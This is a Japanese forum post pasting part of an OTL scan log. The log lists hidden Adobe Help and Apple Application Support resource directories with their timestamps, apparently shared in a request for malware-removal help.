[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X\using
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ca_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\cs_CZ
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\da_DK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\de_DE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\es_ES
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\eu_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fi_FI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fr_FR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hr_HR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hu_HU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\it_IT
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ja_JP
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ko_KR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nb_NO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nl_NL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pl_PL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pt_BR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ro_RO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ru_RU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sk_SK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sl_SI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sv_SE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\tr_TR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\uk_UA
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_CN
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_TW
  • あすとろ
  • 2015/09/15 (Tue) 12:00:04
返信フォームへ 
OTL3
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreGraphics.resources
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaToolbox.resources
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ar.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ca.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\cs.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\da.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\de.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\el.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\English.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\en_GB.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\es.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\he.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hu.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\id.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\it.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ja.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ko.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ms.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nb.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt_PT.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ro.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ru.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sv.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\th.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\tr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\uk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\vi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_CN.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_TW.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ar.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ca.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\cs.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\da.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\de.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\el.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\English.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\es.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\he.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hu.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\id.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\it.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ko.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ms.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nb.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt_PT.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ro.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ru.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sv.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\th.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\tr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\uk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\vi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_CN.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_TW.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources\Profiles
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources\en.lproj
